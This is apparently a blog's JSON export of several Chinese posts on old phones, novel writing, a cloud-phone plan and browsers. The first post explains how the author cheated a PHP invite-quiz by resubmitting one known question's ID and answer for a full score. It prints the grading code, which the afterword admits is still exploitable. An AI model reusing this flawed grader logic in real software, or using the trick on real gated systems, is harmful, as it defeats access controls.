我大概看了一下，这个答题系统的获得题目和提交都是由同一个php程序工作的，过程是答题之前获得一组题目，答完后将答案和一组表示题目的ID组合到一起提交到这个程序上，提交后如果分数超过70分就会生成一个邀请码。看着这个过程，我突然脑洞大开，想着既然这个程序阅卷时只用ID和答案，那么我如果会做其中一道题，让这个程序反复批已知答案的同一道题，那么我就可以得满分了吧。   结果还真是这样，有点不可思议，于是我就成功的注册了花火学园。   注册后我就给管理员说了这个问题，也是这样的一次机会我加入了花火学园的程序组当中。   这个答题系统是由you06大佬开发的，不过我反馈了这个问题以后，貌似问题仍然没有被解决……而我一般看代码也是有一定的机遇，只有心情适合写代码或看代码的时候才愿意去写，所以我成为管理员以后我也没有解决。   关于答题系统这个东西我一直觉得开发起来很简单，像客观题就是比对一下答案是不是一致就行了，所以说我上了大学以后，我一直想着和同学一起做个答题系统练练手，可惜现代大学生最喜欢干的事情就是摸鱼，所以一直都没有做答题系统。   不过前几天正好我的心情符合看代码的状态，然后就看了看我能不能解决这个问题。修复漏洞我闲来无事打开看了看阅卷的这个小程序，整个代码很短，也很好理解。当时加入程序组后我和you06说用session解决这个问题也许不错，虽然问题没解决，但是能看到他已经写了一部分了，也许是因为调试时出问题了，所以写了一半之后就再没管。   我看了看之所以you06的代码出了问题，其实主要原因是因为环境变量上少加了下划线，所以没读到数据才导致程序出问题的，既然问题找到了，我很轻松的就改了过来。参考代码既然漏洞解决了，那我觉得即使大家看到程序的源代码也没关系，我检查了很多遍，也没看出问题，所以现在我将阅卷系统的核心代码展示出来：<?php  Session_start();  $filename = \"problem.json\";  if ($_SERVER['REQUEST_METHOD'] === 'GET') {    // query problem data    $json_string = file_get_contents($filename);    $questionSet = json_decode($json_string, true);    $questiones = array();    for ($i = 0; $i < 20; $i++) {      $index = mt_rand(0, sizeof($questionSet) - 1);      array_push($questiones, array(        'title' => $questionSet[$index]['title'],        'code' => $questionSet[$index]['code'],        'options' => $questionSet[$index]['options'],        'img' => $questionSet[$index]['img']      ));      array_splice($questionSet, $index, 1);     }    $_SESSION['questiones'] = $questiones;    echo json_encode($questiones);    die();  }  if ($_SERVER['REQUEST_METHOD'] === 'POST') {    // check result    $answers = json_decode(file_get_contents(\"php://input\"), true);    $score = calcscore($answers);    $pass = $score >= 70;    $invitecode = '';    if ($pass) {      $invitecode = invite();    }    echo json_encode(array(      'score' => $score,      'pass' => $pass,      'invitecode' => $invitecode    ));if (isset($_SESSION['questiones'])) {unset($_SESSION['questiones']);}    die();  }  function calcscore($answers) {    $score = 0;    $filename = \"problem.json\";    $json_string = file_get_contents($filename);    $questionSet = json_decode($json_string, true);    for ($i = 0; $i < sizeof($answers); $i++) {      if ($answers[$i]['answer']) {        for ($j = 0; $j < sizeof($questionSet); $j++) {          if ($answers[$i]['code'] == $questionSet[$j]['code'] &&            $answers[$i]['answer'] == $questionSet[$j]['answer']) {              $score += 5;          }        }      }    }    $matchCount = 0;    if ($_SESSION && $_SESSION['questiones']) {      for ($i = 0; $i < sizeof($answers); $i++) {        for ($j = 0; $j < sizeof($_SESSION['questiones']); $j++) {\t  if ($answers[$i]['code'] == $_SESSION['questiones'][$j]['code']) {\t    $matchCount++;\t  }\t}      }    } else {      return 0;    }    if ($matchCount == sizeof($answers)) {      return $score;    } else {      return 0;    }  }  function invite() {    //generate invite code  }结尾其实答题系统想让用户钻不了空还是相当简单的事情，不过我个人还是希望那些答题系统能不要写的太精密，这样谁都不会胜利，互相为难也不好嘛……后记我的愚蠢超乎我想象，这个代码的漏洞应该说完全没有解决，看似复杂的代码就如同破铜烂铁一般，轻易就能击碎QAQ。   我完全没有测试就胡乱改，改完之后除了让代码看起来更加复杂外没有解决任何问题。今天一位名叫Sora Jin的大佬像曾经的我一样测试了这个垃圾答题系统，重新发现了这个漏洞……   不过这次的修复不怎么美观，代码我就不放上来了，不是很难的问题，有兴趣的读者可以自己研究一下。" },{ "title": "关于写小说的技巧探究", "category": "", "tags": "小说, 计划", "url": "/2020/03/12/novel.html", "date": "2020/03/12", "content": "我可从来没写过小说啊……前言我在前几个月定下的5年计划中，有一个制作游戏的计划，不过说实话我的文学水平实在是不堪，所以近些日子我时不时的就在考虑到底怎么样写游戏的剧情才能让玩家觉得不会很无聊。   最近我也有看过一些小说或动画作品，我觉得它们应该也会对我的写作和剧情构思能力有一定的提升。比如《ID:INVADED》，我觉得这是这个季度最有意思的推理动画，另外我还看过《文学少女》，这部小说也同样有着推理内容，而且看完以后会感觉到作者强大的文学底蕴。   对于我的游戏而言，因为整体设计是作为解谜游戏来制作，所以从剧情上来说我也更希望能做成推理的解谜游戏。   虽然我个人没写过小说，但是看了各种优秀的作品以后，我觉得自己应该也能总结它们的特点，写出属于我自己的剧情。   经过我的总结，我认为一部小说总体可以分为两部分，即写作风格和剧情，写作风格可以看做是小说的身体，而剧情则是灵魂。所以我接下来打算以这两个方面来总结一下我对写小说的理解。写作风格从我前面写的几十篇文章来看，大家也都应该知道，我的写作水平是真的垃圾，垃圾到自己只敢写第一遍，不敢读第二遍……不过这么垃圾的东西我也不会删掉，毕竟这作为历史我也不应该消除它。   虽然我的写作能力很垃圾，但是这就是我的写作风格，水平垃圾是水平问题，但是风格垃圾这就没办法了…… （我只会生产垃圾QAQ） 尽管我写的很垃圾，但是我看了看网上的某些小说，发现它们看起来似乎更垃圾，这让我稍微安心了一点点。不过其实我的写作水平总体来说就是大概小学的水平，即使别人写的看起来很烂，但是能发布小说而且还有人打赏的，也要比我写的好吧……   经过我的总结，我觉得写作风格主要来源于作者的平时经历，比如平时喜欢写技术文档的人他如果写小说就是比较理性的风格，虽然我没写过技术文档，但是我觉得至少我写的也算是技术类博客吧（笑），另外如果喜欢ACGN次文化的人在写文章的时候也会经常加入相关语句之类的……比如说梗（Meme），以及在网络社区呆的时间很长，也会喜欢加入一些网络用语。    另外写作能力也算风格的一部分，比如我经常莫名其妙的连续使用连词，比如然后、而且、对于、虽然……之类的，而且在写文章的时候经常前言不搭后语，就感觉似乎自己脑子的缓存很小，可能在写文章的时候也就能存一句话，写下一句话的时候要看一下前一句话然后进行实时演算，这个样子的效率可以说是真的低，不过这也算是用时间解决空间过小的问题吧。   我在小时候也看过很多文章，我记得当时还有订阅过一些刊物，比如《实用文摘》之类的，但是我总觉得我的记忆力是越来越差了，大概和我现在糟糕的生活习惯有关吧，而且即使我看过很多文章和小说，也很难把他们的写作风格吸收……   总而言之，写作风格和写程序一样，一是平时的水平积累，二是脑子够不够用，三是生活经历。这时候我又回去看了看我以前写的MaBBS，由衷的感叹那时我的脑子可真是厉害，那么奇葩的代码我竟然能坚持写到将近1700行！现在的我无论从哪一方面都比不了那时了……但是我也能理解，那时的我为什么弃坑……也和经历有关……TAT剧情写作风格我没法讲的更多了，因为我自己的水平本来就很垃圾，讲的再多就成了对自己的批斗会了23333。对于剧情嘛……就是逻辑方面的东西，我觉得这个我可能更加擅长一些。   首先我认为写剧情要先建立一个相关世界，无论是描写真实的事物，还是描写虚假的事物，都需要先有被描写的对象才可以开始。所以第一点就是对世界的建立。建立世界建立剧情的世界和当造物主一样，要先考虑建一个什么样的世界。对于我看过的大多数小说而言，大家认为写自己所在的世界更加容易一些，毕竟想象不如参照现实来的简单，所以大多数人都会选择地球作为剧情发生地或起始地。   虽然用自己所在的世界创建剧情世界不需要自己考虑太多，一切都是现成的，但是也正是因为一切都是现成的，而且也都是大家生活的地方，所以限制也非常大。首先为了避免被认为是对现实的含沙射影，很多时候可能在写关于地名时不应该使用现实中的地名，同样也不应该写对现实事物或人物造成了什么伤害，否则如果以后知道的人多了，就会被“炎上”，毕竟写小说的人也不希望自己写的东西太过于有争议性，影响到现实中的自己也不太好。   除此之外就是一些现实的常识限制，如果在地球上还修改了一堆基础的物理学，要么会被说是物理没学好 （河马的物理23333），要么就是被人说是强行乱改物理学。总之就是以地球为基准对剧情的限制会比较多，当然写好了也会增加对读者亲密度，因为大家都对自己生活的地球都很了解，不需要再去考虑更多的设定，对读者的压力会小很多。   不过既然我要写的是推理解谜游戏，那么当然不在乎对读者有多少压力，能给读者更大的压力才是解谜游戏有趣的地方，所以我更希望使用非现实世界作为剧情发生的世界。另外如果想增加读者亲密度，也可以把起始地设置为现实世界，剧情发生地在完全自创的世界。   不过自己从零创造世界是个很困难的事情，现实的规则可以不用，但要符合逻辑性，不能因为是自己创造的世界就完全不需要遵守规则，没有逻辑的世界会让人读起来很难受，所以从零创造世界也非常考验作者的水平。角色配置除了世界以外当然还要有在世界中的表演的角色，就像演戏一样，世界是角色表演的舞台，而角色则是在舞台上表演的人，角色的配置也很重要。   对于如何描写角色，用第一视角还是第三视角这个其实不重要，对于初期建立剧情来说，我们不需要考虑那么多，就像建模一样，建模虽然需要一个第一视角（摄像头），但是它不重要，重要的是里面的模型。   对于角色是不是人这种事，其实主要还是看建立的世界如何。建立的世界定义了在其中活动角色的世界观，如果那个世界的角色都认为在那个世界上生存的是对我们来说的怪物，那么它们在那个世界看待怪物里和我们在现实世界看待人是一样的。不一样的是在现实世界中看到怪物，这种事情会与其中人物的世界观发生冲突，然后再引起事件就很容易了。   所以对于角色配置，如果希望搞事情就可以设置与那个世界不相符合的角色，如果希望搞事情不是从这里开始，那就按照建立的世界规则走就可以了。   定义了角色的类型以后，还需要定义角色的一些能力，比如某个角色在整个世界中站在什么样的程度，像主角到底应不应该很厉害，到底是那种打败天下无敌手，还是普通的厉害？或者说就是一个菜鸡？当然这个角色配置也不一定就定下来了，菜鸡也可能凭自己的努力变厉害，或者是欧气爆棚捡到了神级装备，也或者是受神恩赐得到了很强大的能力之类的。   初始的角色能力的配置并不是很重要，因为它可以通过剧情发展变化，重要的是角色能力变化趋势，也就是最后角色的能力如何。在角色能力变化的时候发生的剧情也是比较有意思的。   我看小说的时候很喜欢主角很厉害，因为我看小说的时候喜欢把自己代入到主角中，所以对于我个人而言，我不希望主角遇到糟糕的事情，也不喜欢BE，更不喜欢NTR。发展模式有了舞台和演员，接下来就要开始演戏了。这个戏怎么演，主要就看它的发展走向。根据我的了解，一个故事剧情最重要的就是波折，如果一个故事中全都是高潮，那么它就是很高的平淡无奇。所以一般比较好的写法就是剧情开始怎么低落怎么来，但是不能低落到让读者失去兴趣，之后慢慢上升，上升到一个高度再猛然下降，就这样搞一些发展趋势三角形，最后在上到最高点，让人感觉如同在坐过山车一般。   当然说起来谁都会，写起来可不容易，不过我目前还是没什么好的灵感，现在不过是在积累方法，就让我再多胡诌一阵子吧。    在整个剧情的发展中，最忌讳的就是套路，如果读者在阅读的时候已经预测到结果了，那这一部作品就是垃圾。毕竟大家看剧情要看没见过的，已经见过的还有什么看头？   不过这一方面也很复杂，我现在连我以前的代码都看不懂，怎么才能想到别人没想到的层面呢？如果作家才在第二层，读者都想到第五层了，那还有什么写头？结语总之，写小说还是非常考验水平的，无论从写作水平还是编剧水平，都是要求很高的。写作水平要求的是积累的能力，而编剧水平则要求的是思考深度，这两部分都很难啊……我该怎么样写好我的游戏呢？真希望有人能和我一起来写这个游戏啊……    另外我写的游戏也不只是小说，还要把各种谜题合理的嵌入其中……这个5年计划可真是复杂啊……   P.S.我觉得纯前端写这个还是尽量出逻辑解谜题，毕竟程序题有了源代码还是很容易被破解。" },{ "title": "旧手机的N种用法", "category": "", "tags": "手机", "url": "/2020/03/08/oldphone.html", "date": "2020/03/08", "content": "利用旧手机是废物利用呢还是强行增添价值？起因在上个月我找到了家里的一堆旧电子产品，顺便水了一篇文章。不过像旧电脑可能还有收藏价值，旧手机就毫无用处了。   首先我想的是把旧手机卖掉，之前我在闲鱼上卖掉了一部锤子T1，也才卖200CNY，然后我和买家都不满意，然后事还多，然后其他的手机也都是伊拉克成色……所以剩下的手机我也不打算在闲鱼上卖了。   第二个选项是回收，我在网上回收估价，唯一能找到品牌的华为麦芒4才能回收70多CNY，在线下估才估了120CNY，我想了想这个手机虽然CPU垃圾，成色也垃圾，但是我的屏幕是完好的，而且还是1080P的，一个完好的屏幕总成都不止70CNY吧？何况这个手机还有32GiB的存储，就是拿来存东西也比卖个120CNY好吧？   所以我不再打算把这些旧手机换成钱了，我还是想想怎么样开发它的剩余价值吧。旧手机的用法我在网上查了查旧手机能做什么，看好多文章都说的是做监控、行车记录仪、导航仪、闹钟啥的，更有甚者拿它来做时钟。   我想了想，导航仪和闹钟用自己的手机比旧手机要好多了吧，监控的话手机又不能转，而且不像买的摄像头有自带的NAT穿透，感觉太鸡肋。行车记录仪倒是还可以，屏幕、存储、GPS和摄像头都能用上，不过支架不太好找，而且我也没车没驾照，对我来说也没啥用。   当做时钟倒也是一个不错的想法，毕竟手机屏幕也不小，不过我算了一下，如果用手机当时钟耗电量要比普通时钟大几百倍，而且LCD屏只要开着整个背光都是亮的，如果背景全白亮瞎眼，全黑又感觉浪费，一有强光又看不清，而且人一天也不会看几次时钟，大多数想看时间的时候都会把自己的手机摸出来看，所以这个方案同样很糟糕。   不过我觉得整个手机最有用的也就是屏幕了，所以屏幕应该要用上，然后再思考一下什么事适合旧手机做而不适合自己的手机做……像需要性能的部分电脑做就够了，大多数功能当前用的手机就够了，那么什么事情费手机就让手机来做吧！   我觉得屏幕常亮就已经很费手机了，那么更费手机的应该是让手机做一些小而杂的工作，比如说当服务器？用电脑当服务器太耗电，所以肯定不应该让电脑长时间开着，但是手机很适合24H开机，所以拿来当服务器是个不错的选择，而且当服务器的同时也不占用屏幕，可以让手机最大化的利用。   让手机当服务器的方案很多，毕竟Android系统本身就是基于Linux的，所以运行服务器软件并不是什么难事。想自己搞的话可以自己编译一套ARM指令集的Nginx+PHP+MySQL，嫌麻烦也可以直接用现有的KSWEB，一键安装也很方便，如果手机的配置实在垃圾也可以用BusyBox上带的httpd，然后用C或shell写一套网站都没问题，有CGI也没多难，当然技术厉害的大佬也可以直接写服务器程序也没有问题。   既然旧手机后台的工作已经确定下来了，那么前台的屏幕可以做什么呢？1080P的屏幕应该说也是相当不错了，拿来搞电子相册就挺不错的，不过现在电子相册现在已经淘汰了，而且就显示个照片实在是浪费这么好的屏幕。    不过只显示照片很浪费，那么显示视频如何呢？要不然就直接动态桌面不是更好吗？我觉得这个想法不错，于是我就在Google Play上找了一个不错的Live2D的壁纸，拿来做在桌上的虚拟人偶也不错嘛。   屏幕也用到了，要不然再用个耳机孔？在旧手机上插一套音响设备，然后用服务器控制也可以，或者用语音助手控制也可以，至少华为麦芒4这个手机还支持DTS音效啥的，放歌总比MP3好多了吧？像买一个智能音响也要不少钱，但是旧手机加普通音响的价格就会低很多。   当然，上述一切的前提是这个旧手机只有CPU和存储器过时了，电池坏没坏倒是无所谓，但如果说屏幕和音频解码也很垃圾的话，那么上述效果会差很多。总结综上所述，一部旧手机在外拿来做行车记录仪，在家作为服务器、桌面虚拟人偶和智能音响是个不错的选择，当然想拿来做小型家庭云存储也挺好，NAS那么贵不如用旧手机。   当然以上都是尽可能的利用旧手机的方案，如果懒得折腾还是买正规设备更好，如果觉得上述功能对自己没任何用处，那么换成钱也许更好（其实我也用不到上面那些功能，只是 ……穷疯了？23333 不舍得丢掉，所以想榨干它们最后的价值罢了）" },{ "title": "对于云手机的策划书", "category": "", "tags": "手机, 策划", "url": "/2020/03/01/plan.html", "date": "2020/03/01", "content": "策划？不存在的！前言我写了对未来手机的想象这篇文章之后，突然想起来学校最近搞了一个创新比赛，反正在家里也是闲着，就打算和同学一起参考我的文章搞一下。   不过我只对写我的博客感兴趣，对写像什么调查之类乱七八糟的东西没什么兴趣，然后我就把策划书的大部分内容交给了那个同学，自己就主要写一下大概的方向。   当然作为人来说，他看起来也对写这种东西不怎么感兴趣，瞎编一部分又从网上找了些资料，写了一半就打算就这么交差。不过其实我对这个东西也没抱多大期望，就当给延长的假期找个乐子吧。   那么接下来就是主要内容了：一、执行总结一、概念产品概述远程云手机(Remote Cloud Phone，简称“RCP”)是基于远程控制与虚拟化技术的移动通讯设备，该产品运用云计算与5G技术提高了资源的利用率，大大降低了手机的生产成本和实际运算成本。   该产品主要分为两部分，一部分是价格低廉，且有着强大续航能力的控制与显示终端，另一部分是计算力强大，且无需考虑电能消耗的远程云计算平台。   控制与显示终端利用5G的低延时和高效的传输来尽可能的模拟真实手机的使用效果，由于计算不在本地，所以本地设备的电能消耗和发热都可以做到相当低。远程云计算平台使用虚拟化技术进行动态的弹性计算，既能提高能效比，又可以提高实际的运算能力。由于远程云计算完全不需要考虑发热量和电能消耗，所以也可以提供无限的计算能力。二、面临的市场机会和目标市场定位市场机会： 外部环境：随着手机科技含量的逐步提高，导致手机价格不断上涨，人民群众对于高科技手机日渐增长的需求与手机不断增长的价格产生了矛盾，人们需要一种价格相对较低，又能满足需求的较高性能的手机。 内部环境：虚拟化技术与远程服务器已经成熟，并且这两项也是云手机的实现最为重要的技术。 目标市场定位：由于手机市场还未有完整成熟的云手机产业链，所以应该先占据市场金字塔的中层，依靠成本低的优势开拓市场。针对于云手机现在的状况，应该采用无差异营销战略，集中研发中端产品。三、市场环境与竞争优势市场环境：目前，多家公司已经迈进了“云手机”大门，瞄准了“云端”，共同发力智能手机市场。但仍没有做到彻底意义上的云手机，云手机的市场尚未达到饱和，仍有发展潜力 竞争优势：云手机比起普通智能手机，有几处非常大的优势。  存储优势：云手机本身没有存储功能，所有存储都将“云存储”在服务器中，节省了普通智能手机中的内存条空间。  价格优势：云手机几乎所有的计算与渲染工作全部交给了远程服务器，因此云手机产品主要关注于云手机的外观、屏幕分辨率、摄像头分辨率、电池容量，少了许多硬件的安装，手机成本自然降低。  电量持久性优势：手机由于少了许多硬件的安装，手机内部空间变大，可以安装更大容量的电池，并且由于“云手机”在真正工作时，只起到显示的作用，因此电量持续时间可以更久，不会由于工作太久而发热，不影响用户操作体验。  网速更快：由于所有的计算与渲染工作全部交给了远程服务器，远程服务器的运算速度肯定是大于手机本身的，所以可以提高网速，带给用户极致体验。四、团队概述团队分为四块主体：营销、策划、技术人员和生产。 技术与生产是最为困难的部分。技术人员主要依靠招聘相关专业高素质人才，生产项目依托给华强北，营销策划另外招聘相关专业人员。五、经济状况和盈利能力预测创业初期资金紧张，主要依靠企业投资和创始者资金众筹。 由于云手机概念并未普及，前期需要进行大量宣传，资金主要花在了研发、广告宣传、服务器等设备的购买上。企业前几个季度必然是亏损为主，但后几个季度会趋之平稳，待云手机的优势宣传普及民众，必然会有更多的消费者购买。六、所需资源和所提供的利益企业的经首先营需要资金支持，人才资源支持、场地支持 云手机两大核心技术是虚拟机技术与远程服务器技术，需要购买服务器，因为安卓在ARM指令集运行效率最高，所以最好买ARM指令集的服务器。 由于手机的原本功能都由服务计算，不需要在手机中再安装过多芯片所以能为制造手机商减少硬件安装成本。服务器集群，可以在服务器空闲状态出售空闲算力，获得资金，还可以进行品牌宣传。二、产业背景和市场竞争产业背景：目前，多家公司已经迈进了“云手机”大门，瞄准了“云端”，共同发力智能手机市场。但仍没有做到彻底意义上的云手机，云手机的市场尚未达到饱和，仍有巨大的发展潜力。手机科技含量逐步提高，导致手机价格不断上涨，中低端消费者对于高科技手机的需求日渐增长，但手机价格不断增长，人们需要一种价格相对较低，又能满足需求的较高性能的手机。 市场竞争环境: 多家公司迈进了“云手机”大门。 苹果先行一步，基于原有的MobileMe功能全新改写而成的苹果iCloud服务iCloud正式对全球的苹果开发者开放。 国内的手机厂家也不甘落后，阿里巴巴、小米、腾讯纷纷开始发力。2011年8月，阿里巴巴推出的“阿里云”手机介入智能手机市场。手机系统是自主研发“云智能OS”，采用Cloud App方式，用户无需在手机端下载应用，只要在网络环境下登陆统一的云账号就可以运行OS平台上的各种应用，如阿里浏览器、阿里搜索、手机旺旺等。腾讯已经和华为合作推出了包含19款QQ应用的手机，其和中国电信深度定制的手机QPhone操作系统也在加快面世的速度。小米更是发布首台智能手机以攻城略地。 2011年9月，百度和戴尔也瞄准了“云端”，共同发力智能手机市场。2011百度世界大会上，百度创始人兼CEO李彦宏就流传已久的“百度手机”透露了相关信息。“我们应该已经跟一家国际手机厂商达成了协议”。最终中国搜索引擎巨头百度将携手全球第二大PC制造厂商戴尔公司共同开发智能手机以及平板电脑。双方合作的手机产品预计将于11月—12月期间上市销售。与此同时，百度在本次大会上还发布了移动终端操作系统“百度易”，并开始向第三方开发商抛出橄榄枝。不难看出，百度进军移动互联网领域的目标正在有条不紊的进行着。 与此同时不少厂商还瞄准了老人手机市场，其中2012年3月国内首款云老人手机由沃爱思推出。其将云服务功能用于老人手机，实现了子女远程即可操作控制父母手机的全新体验。只需轻松通过web端，即可达到子女身边电脑和父母的沃爱思云服务手机之间的连接，内容变更、设置设定等就可以变成一件没有距离的事情。可以为老人进手机的所有设置，可以远程管理设置：远程定位、健康资料、联系人、图铃、闹钟、桌布时间与日期、键盘、高级设置、手机模式等菜单功能。三、市场调查和分析一、目标市场的定位与分析云手机尚未普及，可以凭借其成本低价格低的优势，获得中低端消费者的青睐，具体的目标群体应该是高中生大学生，这类消费者消费能力处于中高端水准，并且有较高的素质，弄够理解云手机的概念并更好的使用云手机的相关功能。根据调查报告显示，大学生对手机要求最重要的是运行速度，占34%;其次是功能全面，占29%；在往下是价格便宜，占18%；当然外观漂亮也是重要的，占14%；其余的要求占4%。云手机依靠远程服务器拥有运行速度的优势，能够很好地满足消费者需求。二、市场容量估算和趋势预测由于云手机概念产品并未正式上市，所以其市场容量估算和趋势预测只能依靠2009-2018年智能手机的市场容量估算和趋势去进行参考，云手机的出现将是与智能手机的出现一样具有跨时代革命意义的，所以云手机的发展趋势可以拿智能手机这些年的发展作为一个参考。 近几年，中国智能手机行业蓬勃发展，手机更新换代频繁，手机产量持续增长。2016年手机产量达到最高峰，共计22.61亿部。2018年1-11月手机产量为16.41亿部，同比下降2.4%。预计2019年手机产量降幅或扩大。 手机市场趋向于存量状态，国内手机市场国产品牌迅速崛起。国内手机存量市场份额最大的仍然是苹果，占比28.90%，华为占比17.10%；国产品牌手机近年来占比持续上升，华为在2018年的市场占有率达到26.39%，OPPO和Vivo占比达到将近40%。中国巨大的市场需求给中国本土手机品牌的崛起增添了更多的筹码，国内分销市场代理国内品牌的比例普遍上升。 5G将带来新一轮换机潮。基于作为移动互联入口的智能手机与人类生活深度融合，5G手机有望开启智能手机的高速物联时代。5G作为第五代移动通信网络，相比于4G网络来说，其最高理论传输速度可达数10Gb/秒，快了将近数百倍，一部完整超高清画质的电影可在一秒内下载完成。预计2019年5G智能手机出货量占智能手机出货量总额的0.5%，整体智能手机出货量在下降，但是5G智能手机预计到2023年有望超过4亿台，市占率达到26%。 经过十多年高速发展，中国手机市场接近饱和状态，虽然全面屏、AI等技术带动了手机行业的发展，但在5G到来之前，这些技术还不足以带来大面积的换机需求。而在国际上的一些新兴市场，依然存在增长红利。 华为目前在欧洲、中东、非洲和印度市场都加快脚步；受益于中国和印度市场出货量大增，小米成为2018年全球增速最快的手机品牌之一，除了印度之外，目前其加速发力西班牙、俄罗斯、欧洲等市场。三、竞争格局分析和竞争优势三星在2019年全球智能手机出货量市场占份额为21.6%；华为在2019年全球智能手机出货量市场份额为17.6%位居第二；苹果市场占份额为13.9%。小米出货量为1.256亿台，占市场份额为9.2%；OPPO出货量为1.143亿台，占市场份额为8.3%。值得一提的是，前五大手机厂商市场份额超全球智能手机市场份额的7成。 在一个竞争如此激烈的市场存活绝非易事，需要有过人的竞争优势。云手机概念产品最大的优势便是其续航能力，因为云手机本身只负责接收和显示，耗电量并不大，估算续航能力是普通手机的3-4倍。并且计算和渲染在服务器中进行，所以处理速度也是可以令消费者满意的。四、估计的市场份额和销售额2019年全球智能手机出货量为13.71亿部，同比下降2.3%。全球智能手机出货量连续第三年下滑。 从手机厂商来看，2019年，三星、华为、苹果、小米、OPPO出货量排名前五位，出货量分别为2.96亿部、2.41亿部、1.91亿部、1.26亿部、1.14亿部。2019年，尽管华为在海外市场面临持续挑战，但仍超越了苹果成为智能手机出货量全球第二。未来，伴随着网络覆盖率提高、5G提速，中国消费者仍在等待更加亲民的5G智能手机面市。五、市场发展的趋势智能机行业呈现平缓发展状态，2018年市场规模达到15.6亿台，同比增长9.4%，随着人口红利枯竭，智能机市场增长动力主要依靠迭代换新。 苹果在国内的市场首席地位并未被超越，但以华为、oppo和vivo为首的国产阵营品牌抓住科技机遇和换机红利，不断扩大市场空间，而小米、三星、魅族等品牌则有锁缩水。 智能手机迭代需求弥补人口红利动力减弱的损失，通过更富科技感和时尚感的产品设计和定位，激发人们的换机心理，推动市场向更高层次发展。 一、二线城市以及东部沿海地区引领高端智能机市场，三、四线、五线城市以及华中、西南、西北等内陆地区则不断升级设备，其中定位中端的智能机较受欢迎。 一线城市智能移动终端市场新增乏力，二线城市是新增智能移动终端主要市场，新增设备以高端机为主流，三线及以下城市的增幅更加明显，中端机更加受到用户亲睐。 智能移动终端质量方面整体提升明显，电池、屏幕等主要故障问题逐步减少，但是，内存不足问题有所升温；智能移动终端维修渠道目前主要依赖官方售后和传统线下门店。 根据上面数据可得几个结论：  智能机市场增长动力主要依靠迭代换新。  需要更富科技感和时尚感的产品才能促进迭代换新。  定位中端的智能机较受欢迎。  二、三线城市是新增智能移动终端主要市场。  内存不足问题有所升温。从以上结论中发现云手机概念产品是适合当下市场的消费者需求与大环境发展趋势的 云手机概念产品的提出，可以有力的促进迭代换新，从而从接近饱和的市场中再次开拓新的市场。并且云手机消费群众定位在中端消费者与二三线城市，且中端消费者的市场还未饱和，仍有开拓潜力。云手机本身优势可以很好地解决内存、手机发热、价格过高的问题。四、公司战略一、商业模式关键业务： 统一通信、通信设备、云计算与云服务 核心资源： 创新的技术、人才资源、顾客信息 价值主张： 以提高人们生活质量为愿景，运用云计算科学与技术领域专业,缩小贫富差距， 让人人享有。以绿色科学为基本准则，应对全球变暖挑战，资源集群化，减少能源浪费，创造更佳的社会效益，经济效益。 顾客关系： 以顾客和市场为中心。 与客户结为战略合作伙伴，以双赢为发展目标。以及时挖掘顾客需求作为企业发展动力；以客户不断增长的需求作为企业存在的意义。 销售渠道： 分销渠道，直销渠道。 售后服务： 设置对应的客户群经理、区域客户代表，了解客户需求，满足客户需求。确保及时响应。设有服务热线，顾客可以直接通过拨打热线来反映需求，其需求将由专人转达给相关人员，最后再反馈给客户。成本结构：研发成本、采购成本、生产成本、无形成本 收入来源：通信设备占主要，云计算与云服务占次要。其中主要为通信设备购买、云端软件购买、服务器空闲资源出租二、公司的研发方向和产品线扩张策略公司研发方向主要是设计产品外观、服务器群的搭建、最重要的事开发、优化远程连接服务器与手机的软件 产品线扩张策略：在概念产品基本研制完毕的基础上，第一季度主要搭建服务器群组，第二季度进入设备测验、调试、生产阶段，并进行策划宣传。第三季度正式投入市场。每两个季度推出一款优化过的云手机。优化主要是针对设备运行速度。三、主要的合作伙伴与竞争对手等主要的合作伙伴是生产商、宣传商、设备及其零件提供商。 主要对手是例如像华为、苹果这样已经在云手机方面有开发经验和已经开始研发的厂商。五、关键的风险和问题一、技术方面可能存在实际产品的网络稳定性无法达到预期，或使用效果无法和原机相比。 这部分可以通过向更可能提供稳定网络区域的消费者宣传，比如上班族等使用范围始终在稳定区域的人们二、市场方面可能出现消费者不信任等问题。 这个解决方案可以通过提高宣传预期来降低人们对这个产品的不信任。三、财务方面可能存在初期成本无法回收等问题。 可以通过众筹等方式融资。后记我在这个活动结束之后，仔细思考了一下我的这个产品的的实用性。   我看了一下现在更多人买手机的方案，发现我的产品还是有很多地方是有缺陷的。先不论技术问题，对于消费者来说，现在分期消费已经很流行了，比如一台5000CNY的手机，如果可以免息分期24期，每月也才200CNY左右，而过了两年之后也差不多该换新的手机了，这时候再来一波以旧换新，5000CNY的手机2年后顶1000CNY应该没问题吧？然后第三年换个更好的手机，在不考虑通货膨胀等情况下再分期……这样算下来其实价格也没多高，然后相比于云手机的稳定性又会高很多…… （感觉老考虑这种事的我是不是穷疯了？23333）   不过如果真的有云手机出现，说不定以后终端设备包年免费送，结果最后又回到现在需要一次付清的尴尬情况23333   感觉生活就像是正弦函数一般，不断在前进，但是又不断在重复，感觉进步毫无意义，但是又不能不做……   不过对于我来说，我还是挺希望云手机的出现，因为我觉得云手机更符合手机的意义，堆配置不应该是手机该做的事，那是电脑该做的，手机还是应该做好它便携高效的本职才对。" },{ "title": "Mayx的浏览器使用史", "category": "", "tags": "浏览器", "url": "/2020/02/18/browser.html", "date": "2020/02/18", "content": "我感觉遇到了不错的浏览器最初的改变以前我对浏览器没有什么要求，所以一般都用的是系统自带的浏览器。但是最近几年各大厂商都开始犯病，在浏览器里疯狂加广告，所以没办法，我只好选择其他的浏览器。   我选择浏览器也是近几年才做的事，因为厂商也是最近几年才开始在系统里加广告。   我最初的选择是Firefox，因为我听说Firefox的历史悠久，从很久以前浏览器出现的时候Firefox就已经出现了，只是当时它好像叫Netscape来着。总之就是对Firefox有一些好感，然后就一直用Firefox了，即使我后来换了手机，也一直用的是Firefox。意外发生不知道我是怎么了就手残了，偶然有一次不知道我是想清除缓存呢还是想强行停止Firefox，结果手残点到卸载上了……而且更加不可思议的是下一步我还点到确认键上了……结果我的浏览器就随着我的一大堆书签消失不见了……   当时貌似我周围没有WiFi，只有流量，再下一遍Firefox有点太费了，不过我在搜索Firefox的时候发现了Firefox Lite（原Firefox Rocket），大小只有几MiB，是给中国和印度的特供版。我查了一下貌似是北京谋智公司搞的，说实话我不太放心这个公司，但是当时也没有想太多，然后就一直用着了。   不过这个浏览器的功能是真的少，垃圾的以至于UA也改不了，网页源代码也看不了，更不用说什么插件啥的……不过我想我不过是用手机上个网罢了，也不打算干什么复杂的事情，所以也就忍了。   后来想上贴吧，因为这个破浏览器不能改UA，所以我只好使用PHP解决这个问题。偶然遇见我后来想了想，也许上不了贴吧是我的问题，解决方案可能比我想象的更多，比如说换浏览器之类的，不过问题已经解决了我也就没多想。   